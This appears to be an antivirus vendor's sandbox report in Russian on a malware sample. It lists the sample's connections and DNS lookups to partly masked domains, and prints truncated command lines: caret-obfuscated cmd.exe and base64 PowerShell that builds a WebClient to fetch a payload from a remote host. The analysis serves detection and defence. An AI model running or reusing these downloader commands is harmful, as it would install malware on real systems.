Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /v:^on^ ^ ^ /r"s^e^T ^ ^X^H^=^pow^er(0e^ll^ -^e^ ^J^:B^E:H^I^:^Sw^:9:G{^:Z^,^B3^:C^#:bwBi^:^G^o^:Z,B^4^:H,^:^I:^B.^:^GU^:d^:^:/^:^Fq:Z^,Bi:^E;:b^:Bp:G^U:^bgB#:D(:^J:^B^L:^H^Y^:,g^:^9^:Cq^:a...
Сетевая активность
Подключается к
- 'di####l.etnasoft.eu':80
- 'so###maven.com':80
TCP
Запросы HTTP GET
- http://di####l.etnasoft.eu/S
UDP
- DNS ASK di####l.etnasoft.eu
- DNS ASK so###maven.com
- DNS ASK is####lites.com.ng
- DNS ASK mo####godoi.com.br
- DNS ASK ni##si.in
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v:^on^ ^ ^ /r"s^e^T ^ ^X^H^=^pow^er(0e^ll^ -^e^ ^J^:B^E:H^I^:^Sw^:9:G{^:Z^,^B3^:C^#:bwBi^:^G^o^:Z,B^4^:H,^:^I:^B.^:^GU^:d^:^:/^:^Fq:Z^,Bi:^E;:b^:Bp:G^U:^bgB#:D(:^J:^B^L:^H^Y^:,g^:^9^:Cq^:a...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAHIASwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABLAHYAQgA9ACcAaAB0AHQAcAA6AC8ALwBkAGkAZwBpAHQAYQBsAC4AZQB0AG4AYQBzAG8AZgB0AC4AZQB1AC8AUwBAAGgAdAB0AHAAOgAvAC...
